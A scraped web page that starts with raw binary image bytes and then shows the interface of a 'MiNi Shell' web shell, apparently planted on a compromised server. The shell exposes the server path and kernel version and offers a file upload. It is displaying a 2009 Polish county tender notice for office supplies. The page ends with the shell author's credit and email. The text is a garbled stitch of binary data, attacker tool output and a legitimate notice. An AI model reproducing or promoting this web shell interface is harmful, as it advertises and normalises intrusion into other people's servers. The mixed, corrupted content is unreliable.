JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090428/124738-N-2009.html

<p class="kh_header"><b>Ząbkowice Śląskie: Dostawa - Artykułów biurowych oraz  materiałów eksploatacyjnych 
    do maszyn i sprzętu biurowego.</b><br>
<b>Numer ogłoszenia: 124738 - 2009; data zamieszczenia: 28.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Ząbkowicach Śląskich , ul. Sienkiewicza 11, 57-200 Ząbkowice Śląskie, woj. dolnośląskie, tel. 074 8162800, faks 074 8162850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zabkowicki.powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa - Artykułów biurowych oraz  materiałów eksploatacyjnych 
    do maszyn i sprzętu biurowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa - Artykułów biurowych oraz  materiałów eksploatacyjnych do maszyn i sprzętu biurowego:
    1) Papier, wyroby z papieru i tektury.
    2) Rejestry, księgi rachunkowe, skoroszyty, formularze i inne wyroby piśmienne z papieru lub 
        tektury. 
   3) Maszyny biurowe, sprzęt i części zamienne z wyjątkiem komputerów. 
2. Szczegółowy zakres oraz ilość, a także wymagane parametry, określa wykaz stanowiący załącznik
     nr 1 do SIWZ.
3. Materiały eksploatacyjne jak tusze, tonery, folie, muszą odpowiadać wszystkim cechom i warunkom 
    określonym przez producentów maszyn i sprzętu biurowego, są wyrobami fabrycznie nowymi 
    (nieużywanymi, oryginalnymi) i nie użyto do ich produkcji składników uprzednio eksploatowanych, 
    uzupełnianych, bądź przerabianych. Posiadają nienaruszone cechy pierwotnego opakowania i 
    których zdatność do użycia powinna wynosić minimum 6 miesięcy od daty ich dostawy.
4. Zamawiający dopuszcza możliwość złożenia ofert równoważnych w zakresie oferowanych 
    artykułów biurowych pod warunkiem spełnienia wszystkich parametrów określonych w wykazie 
    wymienionym w pkt.2. 
5. Wykonawca dostarczy przedmiot zamówienia do siedziby Zamawiającego oraz złoży w magazynie 
     wg wskazań pracownika Zamawiającego.
6. Na każde żądanie Zamawiającego Wykonawca jest zobowiązany okazać w stosunku do przedmiotu 
    zamówienia odpowiedni certyfikat zgodności z Polską Normą lub normami europejskimi..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8, 22.29.90.00-6, 30.12.50.00-1, 30.14.00.00-2, 30.15.00.00-5, 30.11.90.00-7, 30.23.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 1.800,00 zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w 
    art.22 ust.1 pkt.1-4 ustawy Prawo zamówień publicznych tj,
    a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy 
        nakładają obowiązek posiadania takich uprawnień, oraz udokumentują to przez wykazanie 
        posiadania uprawnień do wykonywania działalności związanej z przedmiotem niniejszego 
        zamówienia publicznego,
    b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami 
        zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów    
        do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia oraz
        udokumentują to przez wykazanie realizacji przynajmniej 3 dostaw odpowiadających swoim 
       rodzajem  oraz wartością stanowiącym przedmiot zamówienia,
    c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
    d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia oraz udokumentują to 
        poprzez złożenie aktualnych zaświadczeń , dokumentów, informacji potwierdzających, że 
       Wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego
2. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w  oparciu o dokumenty 
    załączone do oferty określone  w części VII SIWZ metodą warunku granicznego spełnia- nie 
    spełnia. 
3. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców niespełniających wymagań 
    określonych w art. 24 ust.1 i 2 ustawy Prawo zamówień publicznych.
4. Oferta Wykonawcy wykluczonego uznana zostanie za odrzucona..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu wykazania spełnienia warunków udziału w postępowaniu, określonych w części.VI.pkt.1. SIWZ, każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące dokumenty i 
oświadczenia: 
1. Formularz oferty - z wykorzystaniem wzoru zał. nr 2 do SIWZ,
2. Formularz cenowy - z wykorzystaniem wzoru zał. nr 3 do SIWZ,
3. Dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów 
    prawa lub innych dokumentów rejestrowych,
4. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji
    działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do
    ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem 
    terminu składania ofert, 
5. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że 
    Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane 
    prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
    wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące prze upływem 
       terminu składania ofert,
     6. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy 
         Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem 
         opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał 
         przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
         wstrzymanie wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące 
         przed upływem terminu składania ofert,
7. Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z
    art.22.ust.1 oraz art. 24 ust.1 i 2  ustawy Prawo zamówień publicznych - z wykorzystaniem wzoru 
    załącznik nr 4 do SIWZ. 
8. Wykaz wykonanych przynajmniej 3 dostaw, w okresie ostatnich trzech lat przed dniem wszczęcia 
    niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest
    krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym 
    przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z 
    dokumentami potwierdzającymi, że dostawy te zostały wykonane należycie - z wykorzystaniem 
    wzoru załącznik nr 5 do SIWZ. 
9. Zaakceptowany projekt umowy - załącznik nr 6 do SIWZ.
Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez osobę uprawnioną do składania oświadczeń woli w imieniu Wykonawcy z dopiskiem - za zgodność z oryginałem. 
W innym przypadku należy dołączyć stosowne pełnomocnictwo..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zabkowicki.powiat.pl..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
ul. Sienkiewicza 11 ,
57-200 Ząbkowice Śląskie
pokój nr 110.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2009 godzina 09:00, miejsce: Starostwo Powiatowe
ul. Sienkiewicza 11 ,
57-200 Ząbkowice Śląskie
Sekretariat  pok.202.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com